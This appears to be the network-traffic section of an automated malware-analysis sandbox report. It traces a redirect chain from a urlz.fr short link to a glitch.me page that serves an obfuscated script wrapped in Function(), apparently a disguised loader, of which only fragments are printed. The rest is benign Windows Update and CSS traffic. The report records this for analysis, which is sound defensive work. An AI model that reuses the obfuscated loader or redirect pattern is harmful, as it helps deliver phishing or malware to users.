                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-gfdQ8bF4b8662UCCmW-UyQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                          Permissions-Policy: unload=()
                                                          Date: Tue, 03 Dec 2024 02:26:53 GMT
                                                          Server: gws
                                                          Content-Length: 216
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close
                                                          2024-12-03 02:26:53 UTC216INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 75 72 6c 7a 2e 66 72 2f 74 69 6b 75 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://urlz.fr/tiku">here</A>.</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.449744104.21.234.214443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:26:56 UTC654OUTGET /tiku HTTP/1.1
                                                          Host: urlz.fr
                                                          Connection: keep-alive
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: document
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:26:57 UTC921INHTTP/1.1 302 Found
                                                          Date: Tue, 03 Dec 2024 02:26:57 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          location: https://troubled-worried-bamboo.glitch.me/
                                                          expires: Tue, 03 Dec 2024 02:27:57 GMT
                                                          Cache-Control: max-age=60
                                                          x-fastcgi-cache: HIT
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSr6G%2BHzbto8uMMFYKO84HEIdfwmpWlhq9sYNejouKN5H1kTh6KMczxrrULc3XkEG6XQFGcUF%2BQAqY1ualt2IMrRqxpphcQbzcZ6%2BMv1QMj4ya9mMgiv1D0A"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec01d61cf62436f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8072&min_rtt=1686&rtt_var=4580&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2812&recv_bytes=1232&delivery_rate=1731909&cwnd=181&unsent_bytes=0&cid=c9a821b725f4486a&ts=728&x=0"
                                                          2024-12-03 02:26:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.44974635.153.112.86443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:26:59 UTC676OUTGET / HTTP/1.1
                                                          Host: troubled-worried-bamboo.glitch.me
                                                          Connection: keep-alive
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: document
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:26:59 UTC508INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:26:59 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 235442
                                                          Connection: close
                                                          x-amz-id-2: mwB2t59ctxLiHLZ4c4OyXwB+62s6g+TuKb7r4VpRtKsTTCmLNfzxwYk+mkIvNuIO33cPQNCSAu4=
                                                          x-amz-request-id: K77D58P4MTNXRJM3
                                                          last-modified: Tue, 03 Dec 2024 00:01:43 GMT
                                                          etag: "590f51952b685152b4bdcd17f5e5b92e"
                                                          x-amz-server-side-encryption: AES256
                                                          cache-control: no-cache
                                                          x-amz-version-id: veAaYM3Xvj0oli2HM2beS3DO0AKrpsyn
                                                          accept-ranges: bytes
                                                          server: AmazonS3
                                                          2024-12-03 02:26:59 UTC8441INData Raw: 3c 73 63 72 69 70 74 3e 0a 20 20 46 75 6e 63 74 69 6f 6e 28 0a 20 20 20 20 27 5c 27 2e 6f 75 5f 65 69 32 7e 71 72 6d 2b 6f 67 36 36 40 37 40 77 5b 5e 6b 40 37 5f 7d 7e 7e 26 68 65 5d 2a 74 7d 73 67 70 25 32 61 39 5d 63 34 69 6b 69 7b 7e 6e 38 2a 33 26 76 7e 77 40 63 78 7b 2b 37 70 79 78 7a 6c 2d 2e 39 25 31 38 78 37 6d 37 6b 72 33 65 6a 66 74 66 5d 21 6e 71 2b 66 21 73 71 39 26 2d 2c 74 7a 34 6a 2a 40 72 2c 36 7d 6e 5b 71 34 6b 6a 37 70 2a 2e 78 36 5b 21 63 65 33 66 71 6e 2c 5b 38 2d 5f 77 2b 78 39 79 31 23 23 23 35 21 40 38 70 77 68 69 2d 31 7b 2e 7e 25 73 72 79 26 33 37 23 6f 65 6c 31 65 7b 6b 7d 35 36 7a 77 76 65 5b 40 34 5f 73 6f 67 77 61 74 36 31 78 67 6f 23 73 78 2e 70 36 76 2b 6d 6b 73 66 33 70 5e 71 6d 39 68 6f 73 2c 2b 65 2a 32 74 65 2d 26 40 75
                                                          Data Ascii: <script> Function( '\'.ou_ei2~qrm+og66@7@w[^k@7_}~~&he]*t}sgp%2a9]c4iki{~n8*3&v~w@cx{+7pyxzl-.9%18x7m7kr3ejftf]!nq+f!sq9&-,tz4j*@r,6}n[q4kj7p*.x6[!ce3fqn,[8-_w+x9y1###5!@8pwhi-1{.~%sry&37#oel1e{k}56zwve[@4_sogwat61xgo#sx.p6v+mksf3p^qm9hos,+e*2te-&@u
                                                          2024-12-03 02:26:59 UTC7943INData Raw: 59 32 35 34 30 2a 38 53 34 38 37 66 34 36 31 43 58 33 62 61 38 31 35 38 32 33 32 62 31 31 59 38 39 66 32 36 32 39 37 65 61 61 37 31 33 37 61 65 63 35 46 59 44 33 37 36 44 41 39 32 63 39 39 4c 36 37 33 58 30 34 64 31 37 31 31 37 58 47 31 36 58 64 62 34 38 62 35 32 32 39 44 34 34 62 32 31 61 38 38 62 30 37 38 37 34 46 37 36 34 44 31 33 65 61 62 31 38 38 35 66 32 41 33 31 35 38 43 46 36 35 46 63 31 34 36 37 34 43 37 38 32 66 30 35 63 43 30 4b 33 33 46 43 32 32 46 39 43 23 39 37 36 65 33 61 64 61 37 31 34 39 37 49 34 37 31 44 58 34 59 62 38 33 33 58 35 34 32 59 58 32 38 39 32 46 46 32 64 63 36 46 41 43 32 59 58 34 31 61 65 31 59 38 38 66 35 36 32 43 46 33 63 66 38 36 43 63 38 34 32 61 33 31 36 38 36 46 59 31 65 44 37 56 35 35 38 31 38 37 35 46 31 35 59 63 35
                                                          Data Ascii: Y2540*8S487f461CX3ba8158232b11Y89f26297eaa7137aec5FYD376DA92c99L673X04d17117XG16Xdb48b5229D44b21a88b07874F764D13eab1885f2A3158CF65Fc14674C782f05cC0K33FC22F9C#976e3ada71497I471DX4Yb833X542YX2892FF2dc6FAC2YX41ae1Y88f562CF3cf86Cc842a31686FY1eD7V5581875F15Yc5
                                                          2024-12-03 02:27:00 UTC8949INData Raw: 65 30 34 38 38 31 33 35 41 35 3f 34 37 63 65 39 34 37 43 31 58 39 39 43 28 37 37 38 64 31 34 46 41 46 33 32 38 41 47 30 36 63 44 46 23 35 61 62 31 33 38 63 66 35 36 35 44 46 54 64 36 32 46 33 38 39 46 35 36 38 38 31 23 46 62 32 48 44 38 38 46 31 35 43 63 31 65 39 36 59 63 33 35 32 65 66 34 59 63 35 32 38 61 34 63 30 34 36 44 58 35 34 63 30 33 33 35 39 31 30 36 62 44 43 34 37 62 35 32 58 36 31 43 38 33 31 39 58 35 38 37 36 31 59 38 33 59 44 36 32 63 61 53 33 61 61 31 35 37 65 66 63 36 41 39 58 33 33 61 33 31 31 38 37 46 37 35 37 44 41 32 46 41 38 31 34 38 37 65 35 35 62 43 58 5d 31 35 36 66 64 37 34 61 62 32 30 38 61 58 34 41 43 63 61 36 66 44 37 31 31 59 36 31 58 35 37 56 59 36 63 58 36 34 62 41 44 32 59 35 32 50 31 32 63 58 31 34 39 63 31 31 39 38 46 66
                                                          Data Ascii: e0488135A5?47ce947C1X99C(778d14FAF328AG06cDF#5ab138cf565DFTd62F389F56881#Fb2HD88F15Cc1e96Yc352ef4Yc528a4c046DX54c03359106bDC47b52X61C8319X58761Y83YD62caS3aa157efc6A9X33a31187F757DA2FA81487e55bCX]156fd74ab208aX4ACca6fD711Y61X57VY6cX64bAD2Y52P12cX149c1198Ff
                                                          2024-12-03 02:27:00 UTC8949INData Raw: 30 66 39 38 37 32 41 38 35 4c 30 36 39 64 34 33 39 36 31 58 33 33 59 43 41 36 37 43 33 33 64 41 30 31 43 33 38 62 65 35 36 63 63 33 38 61 62 44 31 38 38 65 33 35 34 59 46 32 64 61 36 64 39 34 30 41 39 31 36 64 30 65 65 39 33 66 62 33 35 64 61 34 32 37 59 32 31 39 37 7b 31 36 36 64 34 34 65 37 36 32 35 39 58 46 36 36 43 64 38 34 59 37 31 31 37 37 66 66 38 36 31 44 31 34 62 37 39 63 65 35 66 46 35 36 31 44 34 65 64 37 62 31 58 37 39 66 34 35 64 63 38 32 64 35 35 44 37 32 66 43 32 35 62 62 62 32 38 35 32 64 38 37 30 65 36 35 32 63 35 65 62 41 32 46 44 36 65 64 39 34 37 63 30 66 33 35 41 63 33 33 30 65 61 21 38 41 44 31 35 34 66 66 34 35 43 39 35 33 59 59 31 31 59 38 30 58 58 36 38 39 30 33 46 37 37 2e 43 37 43 58 41 36 30 44 30 33 30 62 33 2c 38 38 31 58 44
                                                          Data Ascii: 0f9872A85L069d43961X33YCA67C33dA01C38be56cc38abD188e354YF2da6d940A916d0ee93fb35da427Y2197{166d44e76259XF66Cd84Y71177ff861D14b79ce5fF561D4ed7b1X79f45dc82d55D72fC25bbb2852d870e652c5ebA2FD6ed947c0f35Ac330ea!8AD154ff45C953YY11Y80XX68903F77.C7CXA60D030b3,881XD
                                                          2024-12-03 02:27:00 UTC26INData Raw: 33 58 41 37 31 32 37 37 39 66 32 31 37 39 5d 63 41 35 25 35 37 32 39 63 32 32
                                                          Data Ascii: 3XA712779f2179]cA5%5729c22
                                                          2024-12-03 02:27:00 UTC8949INData Raw: 59 41 33 30 39 43 21 66 33 35 65 63 34 37 59 38 32 33 39 31 57 41 33 64 61 34 50 64 37 61 33 34 35 32 66 37 35 66 39 39 33 65 61 36 44 46 38 63 46 59 36 38 64 34 4f 30 61 66 58 37 37 63 65 63 35 41 44 30 34 30 61 30 32 33 37 38 46 31 35 44 44 30 32 58 61 34 31 37 34 61 39 46 34 36 59 44 46 35 36 39 64 34 32 64 66 35 31 33 62 38 32 30 35 61 46 46 36 37 41 30 35 30 41 58 32 31 38 63 47 30 36 41 64 63 34 30 62 62 65 31 35 30 46 35 35 64 39 37 33 43 61 34 44 44 38 46 65 66 36 35 64 36 33 36 41 43 64 37 34 36 58 59 35 33 38 44 33 32 39 41 64 33 38 36 66 34 34 65 62 64 33 32 36 31 47 36 38 36 64 65 35 30 62 36 33 30 39 36 4a 31 33 35 41 34 34 39 62 31 58 59 39 30 66 38 33 31 65 37 34 39 37 37 58 36 38 62 46 33 32 64 64 32 33 61 37 33 32 61 38 35 66 36 35 43 64
                                                          Data Ascii: YA309C!f35ec47Y82391WA3da4Pd7a3452f75f993ea6DF8cFY68d4O0afX77cec5AD040a02378F15DD02Xa4174a9F46YDF569d42df513b8205aFF67A050AX218cG06Adc40bbe150F55d973Ca4DD8Fef65d636ACd746XY538D329Ad386f44ebd3261G686de50b63096J135A449b1XY90f831e74977X68bF32dd23a732a85f65Cd
                                                          2024-12-03 02:27:00 UTC7435INData Raw: 37 32 38 38 31 66 66 35 66 65 32 33 61 59 30 31 63 38 46 59 35 35 62 43 33 33 63 41 35 31 35 38 46 62 64 31 32 61 33 33 39 61 35 31 38 33 31 59 46 36 32 62 64 33 38 61 31 5f 43 37 31 39 39 31 59 37 33 55 32 39 66 66 62 37 35 64 38 35 34 37 30 66 36 38 65 25 34 37 30 65 33 53 39 63 30 31 62 38 43 46 37 36 35 44 58 31 31 37 38 65 31 34 65 3b 38 32 36 63 62 33 33 36 64 31 32 37 61 59 33 36 43 38 44 33 30 41 39 31 34 37 36 65 61 35 63 62 63 33 43 41 34 31 34 33 43 65 66 35 41 63 62 32 34 41 32 4f 32 34 34 64 39 34 39 59 37 32 44 39 44 46 44 38 30 44 35 34 65 59 41 32 44 38 62 2e 31 37 34 61 37 46 43 41 33 31 61 35 32 66 32 32 46 38 41 35 32 37 30 31 35 37 44 59 37 35 43 63 34 46 44 59 36 2a 64 34 34 46 37 36 32 44 33 32 63 41 41 4d 61 38 64 58 35 35 59 43 37
                                                          Data Ascii: 72881ff5fe23aY01c8FY55bC33cA5158Fbd12a339a51831YF62bd38a1_C71991Y73U29ffb75d85470f68e%470e3S9c01b8CF765DX1178e14e;826cb336d127aY36C8D30A91476ea5cbc3CA4143Cef5Acb24A2O244d949Y72D9DFD80D54eYA2D8b.174a7FCA31a52f22F8A5270157DY75Cc4FDY6*d44F762D32cAAMa8dX55YC7
                                                          2024-12-03 02:27:00 UTC8949INData Raw: 37 36 33 58 35 43 5b 31 36 39 41 33 34 38 62 30 58 39 39 31 50 35 37 38 65 32 34 34 59 36 31 38 39 37 4f 34 32 62 39 58 31 32 61 37 31 37 38 35 46 59 36 62 63 62 34 65 41 33 31 43 38 38 46 59 35 39 43 46 34 32 37 35 43 41 37 31 58 38 32 31 39 31 46 43 35 38 32 30 33 58 58 33 34 62 38 35 32 61 39 32 63 62 37 33 64 39 35 33 62 36 65 63 39 58 2a 38 36 39 44 58 23 44 59 43 33 35 38 44 49 33 36 66 58 32 29 38 41 58 31 36 38 66 46 38 36 38 58 32 31 30 36 35 46 36 38 63 46 38 36 62 38 34 31 32 59 35 31 30 38 62 66 34 35 46 43 34 65 63 36 65 63 36 35 39 46 32 35 32 62 66 65 39 36 46 28 37 37 64 58 39 35 63 38 32 33 39 39 34 2e 35 37 30 44 58 35 37 38 61 46 31 35 41 63 37 38 31 39 66 34 34 61 63 65 36 38 59 46 33 32 43 64 34 33 61 59 34 31 37 34 64 46 46 36 39 43
                                                          Data Ascii: 763X5C[169A348b0X991P578e244Y61897O42b9X12a71785FY6bcb4eA31C88FY59CF4275CA71X82191FC58203XX34b852a92cb73d953b6ec9X*869DX#DYC358DI36fX2)8AX168fF868X21065F68cF86b8412Y5108bf45FC4ec6ec659F252bfe96F(77dX95c823994.570DX578aF15Ac7819f44ace68YF32Cd43aY4174dFF69C
                                                          2024-12-03 02:27:00 UTC8949INData Raw: 43 31 34 34 65 46 33 35 62 39 34 33 35 41 35 31 32 38 44 58 44 36 38 64 35 66 63 39 65 31 38 38 35 65 65 31 64 43 43 4e 34 39 39 3a 39 37 37 65 64 35 44 59 44 34 30 39 35 23 58 37 41 65 64 34 62 63 31 33 34 36 37 62 63 36 33 64 61 31 33 59 30 66 34 34 61 31 32 33 30 44 35 33 64 37 37 31 63 38 34 62 64 37 33 63 64 33 38 59 36 31 35 35 38 65 64 35 64 43 59 34 31 59 31 31 31 39 34 65 39 36 32 43 58 34 31 39 46 31 35 38 38 59 59 31 30 59 37 32 65 36 37 3b 34 37 31 39 65 36 36 38 34 32 39 39 31 43 59 37 30 64 38 31 31 59 32 32 32 38 46 7e 61 36 41 65 35 35 32 37 39 31 43 38 37 2d 35 36 34 39 41 34 39 63 32 31 41 39 30 46 43 36 66 39 35 33 62 61 33 31 63 38 35 66 35 36 66 39 44 66 32 38 33 31 39 38 35 66 38 31 31 39 66 34 32 39 44 31 38 38 31 65 63 35 31 37 39
                                                          Data Ascii: C144eF35b9435A5128DXD68d5fc9e1885ee1dCCN499:977ed5DYD4095#X7Aed4bc13467bc63da13Y0f44a1230D53d771c84bd73cd38Y61558ed5dCY41Y11194e962CX419F1588YY10Y72e67;4719e66842991CY70d811Y2228F~a6Ae552791C87-5649A49c21A90FC6f953ba31c85f56f9Df2831985f8119f429D1881ec5179
                                                          2024-12-03 02:27:00 UTC534INData Raw: 31 39 37 41 41 59 31 41 62 66 32 37 36 30 53 36 37 39 58 33 35 37 38 31 32 39 39 64 7c 44 37 31 58 46 35 31 59 44 33 30 38 41 48 32 33 31 64 36 33 58 37 37 31 64 39 30 66 61 36 65 39 38 34 65 41 41 32 34 39 33 66 35 35 43 43 37 33 46 36 43 64 62 38 30 58 38 32 31 63 37 33 61 61 34 31 38 34 32 66 38 35 34 43 58 33 64 39 46 7c 36 37 31 65 39 36 35 38 34 33 31 61 34 43 59 37 31 65 31 35 31 63 36 32 34 39 58 44 33 32 38 58 33 35 32 59 43 32 31 39 30 46 38 33 62 62 32 33 33 39 31 32 32 38 33 46 36 36 31 59 44 34 38 41 34 31 58 39 30 66 30 36 36 64 36 33 58 36 63 46 38 38 31 65 38 36 34 63 65 33 66 41 38 2e 43 38 37 41 58 32 46 62 62 33 61 39 64 26 34 35 37 65 38 34 39 59 43 32 37 35 37 57 65 37 38 65 61 34 34 63 34 32 36 39 39 54 35 34 31 61 33 3b 41 36 62 32
                                                          Data Ascii: 197AAY1Abf2760S679X35781299d|D71XF51YD308AH231d63X771d90fa6e984eAA2493f55CC73F6Cdb80X821c73aa41842f854CX3d9F|671e9658431a4CY71e151c6249XD328X352YC2190F83bb233912283F661YD48A41X90f066d63X6cF881e864ce3fA8.C87AX2Fbb3a9d&457e849YC2757We78ea44c42699T541a3;A6b2


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.44974520.109.210.53443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:00 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Nr3vsNvaxdKO489&MD=EY85S9GC HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                          Host: slscr.update.microsoft.com
                                                          2024-12-03 02:27:00 UTC560INHTTP/1.1 200 OK
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Content-Type: application/octet-stream
                                                          Expires: -1
                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                          MS-CorrelationId: 14f835f6-57b9-490e-a14d-ef6eed01f4cc
                                                          MS-RequestId: 2ac15161-ac8a-48c9-8c6d-1936ad5eb129
                                                          MS-CV: s3Zl5s/2BEe3zOEA.0
                                                          X-Microsoft-SLSClientCache: 2880
                                                          Content-Disposition: attachment; filename=environment.cab
                                                          X-Content-Type-Options: nosniff
                                                          Date: Tue, 03 Dec 2024 02:26:59 GMT
                                                          Connection: close
                                                          Content-Length: 24490
                                                          2024-12-03 02:27:00 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                          2024-12-03 02:27:00 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.449752104.18.11.207443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:02 UTC639OUTGET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1
                                                          Host: maxcdn.bootstrapcdn.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Origin: https://troubled-worried-bamboo.glitch.me
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: text/css,*/*;q=0.1
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: style
                                                          Referer: https://troubled-worried-bamboo.glitch.me/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:02 UTC949INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:02 GMT
                                                          Content-Type: text/css; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CDN-PullZone: 252412
                                                          CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                          CDN-RequestCountryCode: US
                                                          Vary: Accept-Encoding
                                                          Access-Control-Allow-Origin: *
                                                          Cache-Control: public, max-age=31919000
                                                          ETag: W/"450fc463b8b1a349df717056fbb3e078"
                                                          Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                          CDN-ProxyVer: 1.06
                                                          CDN-RequestPullSuccess: True
                                                          CDN-RequestPullCode: 200
                                                          CDN-CachedAt: 11/15/2024 13:24:43
                                                          CDN-EdgeStorageId: 718
                                                          timing-allow-origin: *
                                                          cross-origin-resource-policy: cross-origin
                                                          X-Content-Type-Options: nosniff
                                                          CDN-Status: 200
                                                          CDN-RequestTime: 0
                                                          CDN-RequestId: af1fc40416780255c53cc73f25ddd9f5
                                                          CDN-Cache: HIT
                                                          CF-Cache-Status: HIT
                                                          Age: 9358
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Server: cloudflare
                                                          CF-RAY: 8ec01d849db642b5-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-12-03 02:27:02 UTC420INData Raw: 37 62 66 64 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30
                                                          Data Ascii: 7bfd/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#6610
                                                          2024-12-03 02:27:02 UTC1369INData Raw: 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 70 72 69 6d 61 72 79 3a 23 30 30 37 62 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32 30 30 70 78
